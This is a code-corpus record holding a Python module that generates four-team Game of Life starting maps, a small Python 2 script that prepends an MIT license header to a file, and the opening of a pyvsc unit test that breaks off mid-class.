ad57b6e0665a7f2a54f2cfa31717ce152ac3d046
|
[
"MIT"
] | null | null | null |
gollyx_maps/rainbow.py
|
golly-splorts/gollyx-maps
|
ad57b6e0665a7f2a54f2cfa31717ce152ac3d046
|
[
"MIT"
] | null | null | null |
gollyx_maps/rainbow.py
|
golly-splorts/gollyx-maps
|
ad57b6e0665a7f2a54f2cfa31717ce152ac3d046
|
[
"MIT"
] | null | null | null |
import math
import itertools
from operator import itemgetter
import json
import os
import random
from .geom import hflip_pattern, vflip_pattern, rot_pattern
from .patterns import (
get_pattern_size,
get_pattern_livecount,
get_grid_empty,
get_grid_pattern,
segment_pattern,
methuselah_quadrants_pattern,
pattern_union,
cloud_region,
)
from .utils import pattern2url, retry_on_failure
from .error import GollyXPatternsError, GollyXMapsError
##############
# Util methods
def get_rainbow_pattern_function_map():
return {
"rainbowmath": rainbowmath_fourcolor,
"rainbow": rainbow_fourcolor,
"sunburst": sunburst_fourcolor,
"quadgaussian": quadgaussian_fourcolor,
"random": random_fourcolor,
"timebomb": timebomb_fourcolor,
"timebombredux": timebomb2_fourcolor,
"randommethuselahs": randommethuselahs_fourcolor,
"crabs": crabs_fourcolor,
"patiolights": patiolights_fourcolor,
"orchard": orchard_fourcolor,
"justyna": justyna_fourcolor,
"rabbits": rabbits_fourcolor,
"multum": multum_fourcolor,
"eights": eightx_fourcolor,
# Need one more
}
def rainbow_jitteryrow_pattern(rows, cols, seed=None, methuselah=None, spacing=None):
if seed is not None:
random.seed(seed)
# L is a characteristic length scale
if spacing is None:
L = 10
else:
L = spacing
if methuselah is None:
methuselah = "rheptomino"
count = cols // L
centerx = cols // 2
centery = rows // 2
# Place one methuselah every L grid spaces,
# up to the maximum multiple of 4 possible
maxshapesperteam = (cols // 4) // L
maxshapes = 4 * maxshapesperteam
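# Worked example with assumed dimensions (illustrative only): cols=200 and the
# default L=10 give maxshapesperteam = (200 // 4) // 10 = 5, i.e. 20 methuselahs
# in total, 5 landing in each of the four shuffled team slots.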
team_assignments = [0, 1, 2, 3]
random.shuffle(team_assignments)
rotdegs = [0, 90, 180, 270]
patterns_list_all = [[], [], [], []]
# This algorithm is structured unusually,
# but ensures everything is centered.
for i in range(maxshapesperteam):
# Populate all four quadrants manually...
end = (i + 1) * L
start = end - L // 2
# +---------------+
# |Q1 |Q2 |Q3 |Q4 |
# | | | | |
# +---------------+
#
# Q1
pattern = get_grid_pattern(
methuselah,
rows,
cols,
xoffset=centerx - centerx // 2 - random.randint(start, end),
yoffset=centery + random.randint(-L, L),
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
team_ix = team_assignments[0]
team_patterns_list = patterns_list_all[team_ix]
team_patterns_list.append(pattern)
patterns_list_all[team_ix] = team_patterns_list
# Q2
pattern = get_grid_pattern(
methuselah,
rows,
cols,
xoffset=centerx - random.randint(start, end),
yoffset=centery + random.randint(-L, L),
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
team_ix = team_assignments[1]
team_patterns_list = patterns_list_all[team_ix]
team_patterns_list.append(pattern)
patterns_list_all[team_ix] = team_patterns_list
# Q3
pattern = get_grid_pattern(
methuselah,
rows,
cols,
xoffset=centerx + random.randint(start, end),
yoffset=centery + random.randint(-L, L),
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
team_ix = team_assignments[2]
team_patterns_list = patterns_list_all[team_ix]
team_patterns_list.append(pattern)
patterns_list_all[team_ix] = team_patterns_list
# Q4
pattern = get_grid_pattern(
methuselah,
rows,
cols,
xoffset=centerx + centerx // 2 + random.randint(start, end),
yoffset=centery + random.randint(-L, L),
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
team_ix = team_assignments[3]
team_patterns_list = patterns_list_all[team_ix]
team_patterns_list.append(pattern)
patterns_list_all[team_ix] = team_patterns_list
pattern_unions = [pattern_union(pl) for pl in patterns_list_all]
return tuple(pattern_unions)
def rainbow_methuselah_quadrants_pattern(
rows, cols, seed=None, methuselah_counts=None, fixed_methuselah=None
):
"""
Add methuselahs to each quadrant.
If the user does not specify any args,
this fills the quadrants with lots of
small methuselahs.
The user can specify which methuselahs
to use and how many to use, so e.g.
can specify 1 methuselah per quadrant, etc.
"""
# set rng seed (optional)
if seed is not None:
random.seed(seed)
small_methuselah_names = [
"bheptomino",
"cheptomino",
"eheptomino",
"piheptomino",
"rpentomino",
]
reg_methuselah_names = [
"acorn",
"bheptomino",
"cheptomino",
"eheptomino",
"multuminparvo",
"piheptomino",
"rabbit",
"rpentomino",
]
BIGDIMLIMIT = 150
mindim = min(rows, cols)
if methuselah_counts is None:
if mindim < BIGDIMLIMIT:
methuselah_counts = [3, 4, 9]
else:
methuselah_counts = [3, 4, 9, 16]
if fixed_methuselah is None:
if mindim < BIGDIMLIMIT:
methuselah_names = reg_methuselah_names + small_methuselah_names
else:
methuselah_names = small_methuselah_names
else:
methuselah_names = [fixed_methuselah]
valid_mc = [1, 2, 3, 4, 9, 16]
for mc in methuselah_counts:
if mc not in valid_mc:
msg = "Invalid methuselah counts passed: must be in {', '.join(valid_mc)}\n"
msg += "you specified {', '.join(methuselah_counts)}"
raise GollyXPatternsError(msg)
# Put a cluster of methuselahs in each quadrant,
# one quadrant per team.
# Procedure:
# place random methuselah patterns in each quadrant corner
# Store each quadrant and its upper left corner in (rows from top, cols from left) format
quadrants = [
(1, (0, cols // 2)),
(2, (0, 0)),
(3, (rows // 2, 0)),
(4, (rows // 2, cols // 2)),
]
rotdegs = [0, 90, 180, 270]
all_methuselahs = []
for iq, quad in enumerate(quadrants):
count = random.choice(methuselah_counts)
if count == 1:
# Only one methuselah in this quadrant, so use the center
jitterx = 4
jittery = 4
corner = quadrants[iq][1]
y = corner[0] + rows // 4 + random.randint(-jittery, jittery)
x = corner[1] + cols // 4 + random.randint(-jitterx, jitterx)
meth = random.choice(methuselah_names)
pattern = get_grid_pattern(
meth,
rows,
cols,
xoffset=x,
yoffset=y,
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
livecount = get_pattern_livecount(meth)
all_methuselahs.append((livecount, pattern))
elif count == 2 or count == 4:
# Two or four methuselahs in this quadrant, so place at corners of a square
# Form the square by cutting the quadrant into thirds
if count == 4:
jitterx = 3
jittery = 3
else:
jitterx = 5
jittery = 5
corner = quadrants[iq][1]
# Slices and partitions form the inside square
nslices = 2
nparts = nslices + 1
posdiag = bool(random.getrandbits(1))
for a in range(1, nparts):
for b in range(1, nparts):
proceed = False
if count == 2:
if (posdiag and a == b) or (
not posdiag and a == (nslices - b + 1)
):
proceed = True
elif count == 4:
proceed = True
if proceed:
y = (
corner[0]
+ a * ((rows // 2) // nparts)
+ random.randint(-jittery, jittery)
)
x = (
corner[1]
+ b * ((cols // 2) // nparts)
+ random.randint(-jitterx, jitterx)
)
meth = random.choice(methuselah_names)
try:
pattern = get_grid_pattern(
meth,
rows,
cols,
xoffset=x,
yoffset=y,
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
except GollyXPatternsError:
raise GollyXPatternsError(
f"Error with methuselah {meth}: cannot fit"
)
livecount = get_pattern_livecount(meth)
all_methuselahs.append((livecount, pattern))
elif count == 3 or count == 9:
# Three or nine methuselahs: place them on a 3x3 grid of points inside the
# quadrant (the diagonal for three, all nine points for nine)
if count == 9:
jitterx = 3
jittery = 3
else:
jitterx = 5
jittery = 5
corner = quadrants[iq][1]
nslices = 4
for a in range(1, nslices):
for b in range(1, nslices):
proceed = False
if count == 3:
if a == b:
proceed = True
elif count == 9:
proceed = True
if proceed:
y = (
corner[0]
+ a * ((rows // 2) // nslices)
+ random.randint(-jittery, jittery)
)
x = (
corner[1]
+ b * ((cols // 2) // nslices)
+ random.randint(-jitterx, jitterx)
)
meth = random.choice(methuselah_names)
try:
pattern = get_grid_pattern(
meth,
rows,
cols,
xoffset=x,
yoffset=y,
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
except GollyXPatternsError:
raise GollyXPatternsError(
f"Error with methuselah {meth}: cannot fit"
)
livecount = get_pattern_livecount(meth)
all_methuselahs.append((livecount, pattern))
elif count == 16:
# Sixteen methuselahs, place these on a 4x4 square
jitterx = 2
jittery = 2
corner = quadrants[iq][1]
nslices = 5
for a in range(1, nslices):
for b in range(1, nslices):
y = (
corner[0]
+ a * ((rows // 2) // nslices)
+ random.randint(-jittery, jittery)
)
x = (
corner[1]
+ b * ((cols // 2) // nslices)
+ random.randint(-jitterx, jitterx)
)
meth = random.choice(methuselah_names)
try:
pattern = get_grid_pattern(
meth,
rows,
cols,
xoffset=x,
yoffset=y,
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
except GollyXPatternsError:
raise GollyXPatternsError(
f"Error with methuselah {meth}: cannot fit"
)
livecount = get_pattern_livecount(meth)
all_methuselahs.append((livecount, pattern))
random.shuffle(all_methuselahs)
# Sort by number of live cells
all_methuselahs.sort(key=itemgetter(0), reverse=True)
team1_patterns = []
team2_patterns = []
team3_patterns = []
team4_patterns = []
asc = [1, 2, 3, 4]
ascrev = list(reversed(asc))
serpentine_pattern = asc + ascrev
for i, (_, methuselah_pattern) in enumerate(all_methuselahs):
serpix = i % len(serpentine_pattern)
serpteam = serpentine_pattern[serpix]
if serpteam == 1:
team1_patterns.append(methuselah_pattern)
elif serpteam == 2:
team2_patterns.append(methuselah_pattern)
elif serpteam == 3:
team3_patterns.append(methuselah_pattern)
elif serpteam == 4:
team4_patterns.append(methuselah_pattern)
team1_pattern = pattern_union(team1_patterns)
team2_pattern = pattern_union(team2_patterns)
team3_pattern = pattern_union(team3_patterns)
team4_pattern = pattern_union(team4_patterns)
return team1_pattern, team2_pattern, team3_pattern, team4_pattern
#############
# Map methods
def random_fourcolor(rows, cols, seed=None):
"""
Generate a random four-color list life initialization.
Returns: four listlife strings,
with the random initializations.
(roughly 8-18% of all cells are alive).
Strategy: generate a set of (x,y) tuples,
convert to list, split in four. Use those
point sets to create listLife URL strings.
"""
if seed is not None:
random.seed(seed)
density = random.randint(8, 18) / 100.0
ncells = rows * cols
nlivecells = 4 * ((density * ncells) // 4)
points = set()
while len(points) < nlivecells:
randy = random.randint(0, rows - 1)
randx = random.randint(0, cols - 1)
points.add((randx, randy))
points = list(points)
pattern_urls = []
# Loop over each team
for i in range(4):
# Subselection of points
q = len(points) // 4
start_ix = i * q
end_ix = (i + 1) * q
this_points = set(points[start_ix:end_ix])
# Assemble pattern
this_pattern = []
for y in range(rows):
this_row = []
for x in range(cols):
if (x, y) in this_points:
this_row.append("o")
else:
this_row.append(".")
this_rowstr = "".join(this_row)
this_pattern.append(this_rowstr)
this_url = pattern2url(this_pattern)
pattern_urls.append(this_url)
return tuple(pattern_urls)
@retry_on_failure
def randommethuselahs_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_methuselah_quadrants_pattern(rows, cols, seed)
result = (pattern2url(pat) for pat in patterns)
return result
@retry_on_failure
def orchard_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
mindim = min(rows, cols)
if mindim < 150:
mc = [4, 9]
else:
mc = [4, 9, 16]
count = random.choice(mc)
patterns = rainbow_methuselah_quadrants_pattern(
rows, cols, seed, methuselah_counts=[count], fixed_methuselah="acorn"
)
urls = (pattern2url(p) for p in patterns)
return urls
@retry_on_failure
def justyna_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
mc = [1]
count = random.choice(mc)
patterns = rainbow_methuselah_quadrants_pattern(
rows, cols, seed, methuselah_counts=[count], fixed_methuselah="justyna"
)
urls = (pattern2url(p) for p in patterns)
return urls
@retry_on_failure
def rabbits_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
mindim = min(rows, cols)
if mindim < 150:
mc = [1, 2]
else:
mc = [1, 2, 3]
count = random.choice(mc)
patterns = rainbow_methuselah_quadrants_pattern(
rows, cols, seed, methuselah_counts=[count], fixed_methuselah="rabbit"
)
urls = (pattern2url(p) for p in patterns)
return urls
@retry_on_failure
def multum_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
mindim = min(rows, cols)
if mindim < 150:
mc = [1, 2]
else:
mc = [2, 3, 4]
count = random.choice(mc)
patterns = rainbow_methuselah_quadrants_pattern(
rows, cols, seed, methuselah_counts=[count], fixed_methuselah="multuminparvo"
)
urls = (pattern2url(p) for p in patterns)
return urls
@retry_on_failure
def eightx_fourcolor(rows, cols, seed=None):
fmap = {
"eightb": _eightb_fourcolor,
"eightc": _eightc_fourcolor,
"eighte": _eighte_fourcolor,
"eightr": _eightr_fourcolor,
"eightpi": _eightpi_fourcolor,
}
k = random.choice(list(fmap.keys()))
return fmap[k](rows, cols, seed)
def _eightb_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_jitteryrow_pattern(rows, cols, seed, "bheptomino")
urls = (pattern2url(p) for p in patterns)
return urls
def _eightc_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_jitteryrow_pattern(rows, cols, seed, "cheptomino")
urls = (pattern2url(p) for p in patterns)
return urls
def _eighte_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_jitteryrow_pattern(rows, cols, seed, "eheptomino", spacing=7)
urls = (pattern2url(p) for p in patterns)
return urls
def _eightpi_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_jitteryrow_pattern(rows, cols, seed, "piheptomino")
urls = (pattern2url(p) for p in patterns)
return urls
def _eightr_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_jitteryrow_pattern(rows, cols, seed, "rpentomino")
urls = (pattern2url(p) for p in patterns)
return urls
@retry_on_failure
def patiolights_fourcolor(rows, cols, seed=None):
"""
The patio lights pattern is a horizontal line segment with boxes placed randomly along it, like a string of lights.
"""
if seed is not None:
random.seed(seed)
urls = []
thickness = random.randint(2, 3)
nteams = 4
# Find the y locations of each light string:
# Divide rows into Nteams + 1 parts with Nteams slices
# Place the light strings at the slices
jittery = 5
lightstring_ys = [
((i + 1) * rows) // (nteams + 1) + random.randint(-jittery, jittery)
for i in range(nteams)
]
# Randomize order of light string team assignments
random.shuffle(lightstring_ys)
# Helper: start/end bounds of a segment of length dim centered on z (defined but not used below)
def _get_bounds(z, dim):
zstart = z - dim // 2
zend = z + (dim - dim // 2)
return zstart, zend
for iteam in range(nteams):
team_pattern = get_grid_empty(rows, cols, flat=False)
# Assemble the light string
lightstring_y = lightstring_ys[iteam]
for ix in range(0, cols):
for iy in range(lightstring_y - 1, lightstring_y + thickness):
team_pattern[iy][ix] = "o"
# Add some lights to the string
jitterx = 4
bounds = (lightstring_y - 1, lightstring_y + thickness)
maxy = max(bounds)
miny = min(bounds)
ylightstop = miny - random.randint(2, 3)
ylightsbot = maxy + random.randint(2, 3)
ix = random.randint(4, 12)
while ix < cols - 1:
if random.random() < 0.50:
team_pattern[ylightsbot][ix] = "o"
team_pattern[ylightsbot][ix + 1] = "o"
team_pattern[ylightsbot + 1][ix] = "o"
team_pattern[ylightsbot + 1][ix + 1] = "o"
else:
team_pattern[ylightstop][ix] = "o"
team_pattern[ylightstop][ix + 1] = "o"
team_pattern[ylightstop - 1][ix] = "o"
team_pattern[ylightstop - 1][ix + 1] = "o"
ix += random.randint(10, 12) + random.randint(-jitterx, jitterx)
pattern_url = pattern2url(team_pattern)
urls.append(pattern_url)
return tuple(urls)
@retry_on_failure
def rainbow_fourcolor(rows, cols, seed=None):
return _rainburst_fourcolor(rows, cols, seed, sunburst=False)
@retry_on_failure
def sunburst_fourcolor(rows, cols, seed=None):
return _rainburst_fourcolor(rows, cols, seed, sunburst=True)
def _rainburst_fourcolor(rows, cols, seed=None, sunburst=False):
"""
Create a Gaussian normal distribution in the top left and bottom right quadrants,
then slice it into radial pieces, which makes a nice rainbow shape.
"""
SMOL = 1e-12
if seed is not None:
random.seed(seed)
# Algorithm:
# set the slope
# generate (x, y) points
# if slope < 1/g, A
# if slope < 1, B
# if slope < g: C
# else: D
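# Concretely (assumed reading of the checks below, with g = 2.5): a sampled
# point is kept only when the slope from the grid center to the point is
# positive, and it is assigned to team 0 for 0 < slope < 1/g, team 1 for
# 1/g < slope < 1, team 2 for 1 < slope < g, and team 3 for slope > g, which
# carves the Gaussian cloud into four radial wedges.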
density = random.randint(8, 18)/100.0
nteams = 4
ncells = rows * cols
npointsperteam = (ncells//nteams)*density
nlivecells = nteams*npointsperteam
centerx = cols // 2
centery = rows // 2
teams_points = []
g = 2.5
slope_checks = [
0,
1/g,
1,
g,
]
urls = []
for iteam in range(nteams):
team_points = set()
while len(team_points) < npointsperteam:
randx = int(random.gauss(centerx, centerx // 2))
randy = int(random.gauss(centery, centery // 2))
slope = (randy - centery) / (randx - centerx + SMOL)
if iteam < 3:
if slope_checks[iteam] < slope < slope_checks[iteam + 1]:
team_points.add((randx, randy))
else:
if slope > slope_checks[iteam]:
team_points.add((randx, randy))
team_pattern = []
for y in range(rows):
team_row = []
for x in range(cols):
if (x, y) in team_points:
team_row.append("o")
else:
team_row.append(".")
team_row_str = "".join(team_row)
team_pattern.append(team_row_str)
if sunburst and iteam%2==0:
team_pattern = vflip_pattern(team_pattern)
team_url = pattern2url(team_pattern)
urls.append(team_url)
random.shuffle(urls)
return tuple(urls)
@retry_on_failure
def timebomb_fourcolor(rows, cols, seed=None):
return _timebomb_fourcolor(rows, cols, revenge=False, seed=seed)
@retry_on_failure
def timebomb2_fourcolor(rows, cols, seed=None):
return _timebomb_fourcolor(rows, cols, revenge=True, seed=seed)
def _timebomb_fourcolor(rows, cols, revenge, seed=None):
if seed is not None:
random.seed(seed)
mindim = min(rows, cols)
# Geometry
# L = length scale
L = 20
centerx = cols // 2
centery = rows // 2
# Each team gets one oscillator and one timebomb
nteams = 4
team_assignments = list(range(nteams))
random.shuffle(team_assignments)
def _get_oscillator_name():
if revenge:
oscillators = ["airforce", "koksgalaxy", "dinnertable", "vring64", "harbor"]
which_oscillator = random.choice(oscillators)
else:
which_oscillator = "quadrupleburloaferimeter"
return which_oscillator
rotdegs = [0, 90, 180, 270]
urls = [None, None, None, None]
for iteam in range(nteams):
# Location:
# x = center + a*L
# y = center + b*L
# QI: a = 1, b = 1
# QII: a = -1, b = 1
# QIII: a = -1, b = -1
# QIV: a = 1, b = -1
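# Worked example with illustrative values: rows=100, cols=120, L=20 put the
# team-0 (QI) oscillator near (x, y) = (80, 70) and its timebomb near
# (100, 90) before jitter, i.e. one and two length scales out from the center.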
if iteam==0 or iteam==3:
a = 1
else:
a = -1
if iteam==0 or iteam==1:
b = 1
else:
b = -1
osc_x = centerx + a*L
osc_y = centery + b*L
bomb_x = centerx + 2*a*L
bomb_y = centery + 2*b*L
# jitter for patterns
osc_jitter_x = 3
osc_jitter_y = 3
timebomb_jitter_x = 6
timebomb_jitter_y = 6
osc_pattern = get_grid_pattern(
_get_oscillator_name(),
rows,
cols,
xoffset=osc_x + random.randint(-osc_jitter_x, osc_jitter_x),
yoffset=osc_y + random.randint(-osc_jitter_y, osc_jitter_y),
rotdeg=random.choice(rotdegs),
)
bomb_pattern = get_grid_pattern(
"timebomb",
rows,
cols,
xoffset=bomb_x + random.randint(-timebomb_jitter_x, timebomb_jitter_x),
yoffset=bomb_y + random.randint(-timebomb_jitter_y, timebomb_jitter_y),
rotdeg=random.choice(rotdegs),
)
team_pattern = pattern_union([osc_pattern, bomb_pattern])
team_url = pattern2url(team_pattern)
team_ix = team_assignments[iteam]
urls[team_ix] = team_url
return tuple(urls)
def crabs_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
rotdegs = [0, 90, 180, 270]
jitter = 1
# 8 crabs total
centerys = [rows//4, 3*rows//4]
centerxs = [cols//5, 2*cols//5, 3*cols//5, 4*cols//5]
nteams = 4
team_assignments = list(range(nteams))
random.shuffle(team_assignments)
crab_patterns = [[], [], [], []]
for i, (centerx, centery) in enumerate(itertools.product(centerxs, centerys)):
imod4 = i%4
crabcenterx = centerx + random.randint(-jitter, jitter)
crabcentery = centery + random.randint(-jitter, jitter)
crab = get_grid_pattern(
"crabstretcher",
rows,
cols,
xoffset=crabcenterx,
yoffset=crabcentery,
hflip=(random.random() < 0.5),
vflip=(random.random() < 0.5),
rotdeg=random.choice(rotdegs),
)
team_ix = team_assignments[imod4]
team_pattern = crab_patterns[team_ix]
team_pattern.append(crab)
crab_patterns[team_ix] = team_pattern
pattern_unions = [pattern_union(pl) for pl in crab_patterns]
urls = [pattern2url(pu) for pu in pattern_unions]
return tuple(urls)
def quadgaussian_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
# Lower bound of 0.10, upper bound of 0.15
density = 0.10 + random.random() * 0.05
ncells = rows * cols
nlivecells = ((ncells * density)//4)*4
nlivecellspt = nlivecells // 4
# Variable blobbiness
stdx = cols// random.randint(8, 16)
stdy = rows// random.randint(8, 16)
jitter = 5
nteams = 4
team_assignments = list(range(nteams))
random.shuffle(team_assignments)
centerxs = [cols//4, 3*cols//4]
centerys = [rows//4, 3*rows//4]
urls = [None, None, None, None]
master_points = set()
for i, (centerx, centery) in enumerate(itertools.product(centerxs, centerys)):
team_ix = team_assignments[i]
cx = centerx + random.randint(-jitter, jitter)
cy = centery + random.randint(-jitter, jitter)
team_points = set()
while len(team_points) < nlivecellspt:
randx = int(random.gauss(cx, stdx))
randy = int(random.gauss(cy, stdy))
if (randx >= 0 and randx < cols) and (randy >= 0 and randy < rows):
if (randx, randy) not in master_points:
team_points.add((randx, randy))
master_points.add((randx, randy))
# Assemble the circle dot diagram for team
team_pattern = []
for y in range(rows):
this_row = []
for x in range(cols):
if (x, y) in team_points:
this_row.append("o")
else:
this_row.append(".")
this_rowstr = "".join(this_row)
team_pattern.append(this_rowstr)
team_url = pattern2url(team_pattern)
urls[team_ix] = team_url
return tuple(urls)
#@retry_on_failure
def rainbowmath_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
def is_prime(n):
n = abs(n)
if n == 2 or n == 3: return True
if n < 2 or n%2 == 0: return False
if n < 9: return True
if n%3 == 0: return False
r = int(n**0.5)
# since all primes > 3 are of the form 6n ± 1
# start with f=5 (which is prime)
# and test f, f+2 for being prime
# then loop by 6.
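# e.g. the loop tests the candidate pairs (5, 7), (11, 13), (17, 19), ...
# which skips every multiple of 2 and 3 up to sqrt(n).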
f = 5
while f <= r:
if n % f == 0: return False
if n % (f+2) == 0: return False
f += 6
return True
def is_not_prime(n):
return not is_prime(n)
# Random choice of which form to use
coin = random.randint(1,8)
if coin == 1:
p = random.choice([k*k for k in [5, 7, 9, 11]])
f = lambda x, y: int(is_not_prime((x*x & y*y) % p))
elif coin == 2:
# Linked diagonals of boxes
ab = [3, 4, 5]
a = random.choice(ab)
b = random.choice(ab)
cs = [16, 18, 20, 22]
c = random.choice(cs)
p = 7
f = lambda x, y: int((x//a ^ y//a)*c % p)
elif coin == 3:
# Linked diagonals of very large boxes
ab = [9, 10, 11]
a = random.choice(ab)
b = random.choice(ab)
cs = [16, 18, 20, 22]
c = random.choice(cs)
p = 7
f = lambda x, y: int((x//a ^ y//a)*c % p)
elif coin == 4:
# Sierpinski triangles
ps = [7, 11, 13, 15, 35, 37]
p = random.choice(ps)
f = lambda x, y: int((x & y) % p)
elif coin == 5:
# This is a one-off that's in perfect sync and makes wild patterns
a = 3
b = 3
p = 99
f = lambda x, y: int((a**x)%p & (b**y)%p)
elif coin == 6:
a = random.randint(1,10)
b = random.randint(1,10)
p = 99
f = lambda x, y: int(is_not_prime((a*x & b*y) % p))
elif coin == 7:
ps = [81, 83, 85, 87, 89, 91, 93, 95, 97, 99]
p = random.choice(ps)
f = lambda x, y: int(is_not_prime((x//(y+1) ^ y) % p))
elif coin == 8:
ps = [69, 99, 299, 699, 999]
p = random.choice(ps)
f = lambda x, y: int(is_not_prime((x*x//(y+1)) % p))
xoffset = 0
yoffset = 0
team_patterns = _expression_pattern(
rows,
cols,
seed,
f,
xoffset=xoffset,
yoffset=yoffset,
)
urls = [pattern2url(pat) for pat in team_patterns]
for url in urls:
if url == "[]":
raise GollyXPatternsError("Error with bitfield: everything is empty")
return tuple(urls)
def _expression_pattern(
rows,
cols,
seed,
f_handle,
xoffset=0,
yoffset=0,
):
nteams = 4
# These store the .o diagrams (flat=False means these are lists of lists of one-char strings)
team_patterns = []
for i in range(nteams):
tp = get_grid_empty(rows,cols,flat=False)
team_patterns.append(tp)
# Assemble a list of cells that are alive at the roots of f (if f returns 0)
coordinates = []
for xtrue in range(0, cols):
for ytrue in range(0, rows):
xtransform = xtrue - xoffset
ytransform = ytrue - yoffset
if f_handle(xtransform, ytransform) == 0:
coordinates.append((xtrue, ytrue))
# Shuffle live cell coordinates
random.shuffle(coordinates)
# Assign live cell coordinates to teams using serpentine pattern
team_order = list(range(nteams))
random.shuffle(team_order)
serpentine_pattern = list(team_order) + list(reversed(team_order))
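# Example (illustrative values): a shuffled team_order of [2, 0, 3, 1] yields
# the serpentine pattern [2, 0, 3, 1, 1, 3, 0, 2], so successive live cells
# sweep back and forth across the teams and each team gets an equal share.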
for i, (x, y) in enumerate(coordinates):
serp_ix = i % len(serpentine_pattern)
team_ix = serpentine_pattern[serp_ix]
team_patterns[team_ix][y][x] = "o"
return team_patterns
| 27.946895
| 113
| 0.540562
| 0
| 0
| 0
| 0
| 5,212
| 0.152362
| 0
| 0
| 4,265
| 0.124678
|
a1e396a0fe0bfe84f4e348a5cd7eab9d9e2a1638
| 2,962
|
py
|
Python
|
filemanipulator.py
|
paulkramme/mit-license-adder
|
1865413c1932a3108883dc2b77c67608d56be275
|
[
"MIT"
] | null | null | null |
filemanipulator.py
|
paulkramme/mit-license-adder
|
1865413c1932a3108883dc2b77c67608d56be275
|
[
"MIT"
] | null | null | null |
filemanipulator.py
|
paulkramme/mit-license-adder
|
1865413c1932a3108883dc2b77c67608d56be275
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python2
import tempfile
import sys
import datetime
mit_license = ("""\
/*
MIT License
Copyright (c) 2016 Paul Kramme
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/
""")
class FileModifierError(Exception):
pass
class FileModifier(object):
def __init__(self, fname):
self.__write_dict = {}
self.__filename = fname
self.__tempfile = tempfile.TemporaryFile()
with open(fname, 'rb') as fp:
for line in fp:
self.__tempfile.write(line)
self.__tempfile.seek(0)
def write(self, s, line_number = 'END'):
if line_number != 'END' and not isinstance(line_number, (int, float)):
raise FileModifierError("Line number %s is not a valid number" % line_number)
try:
self.__write_dict[line_number].append(s)
except KeyError:
self.__write_dict[line_number] = [s]
def writeline(self, s, line_number = 'END'):
self.write('%s\n' % s, line_number)
def writelines(self, s, line_number = 'END'):
for ln in s:
self.writeline(ln, line_number)
def __popline(self, index, fp):
try:
ilines = self.__write_dict.pop(index)
for line in ilines:
fp.write(line)
except KeyError:
pass
def close(self):
self.__exit__(None, None, None)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
with open(self.__filename,'w') as fp:
for index, line in enumerate(self.__tempfile.readlines()):
self.__popline(index, fp)
fp.write(line)
for index in sorted(self.__write_dict):
for line in self.__write_dict[index]:
fp.write(line)
self.__tempfile.close()
filename = sys.argv[1]
#license = sys.argv[1]
print "Licenseadder by Paul Kramme"
with FileModifier(filename) as fp:
fp.writeline(mit_license, 0)
| 32.911111
| 89
| 0.668467
| 1,648
| 0.556381
| 0
| 0
| 0
| 0
| 0
| 0
| 1,222
| 0.412559
|
a1e520db04d481d770fcb8c7ed4dbac6d857ce44
| 4,048
|
py
|
Python
|
ve/unit/test_list_scalar.py
|
aneels3/pyvsc
|
692fa2baa9cc0251411b3a8ace2854b7e65c288a
|
[
"Apache-2.0"
] | null | null | null |
ve/unit/test_list_scalar.py
|
aneels3/pyvsc
|
692fa2baa9cc0251411b3a8ace2854b7e65c288a
|
[
"Apache-2.0"
] | null | null | null |
ve/unit/test_list_scalar.py
|
aneels3/pyvsc
|
692fa2baa9cc0251411b3a8ace2854b7e65c288a
|
[
"Apache-2.0"
] | null | null | null |
'''
Created on Jun 21, 2020
@author: ballance
'''
import vsc
from vsc_test_case import VscTestCase
from vsc.visitors.model_pretty_printer import ModelPrettyPrinter
class TestListScalar(VscTestCase):
@vsc.randobj
class my_item_c(object):
def __init__(self):
self.fixed = vsc.rand_list_t(vsc.bit_t(8), sz=4)
self.dynamic = vsc.randsz_list_t(vsc.bit_t(8))
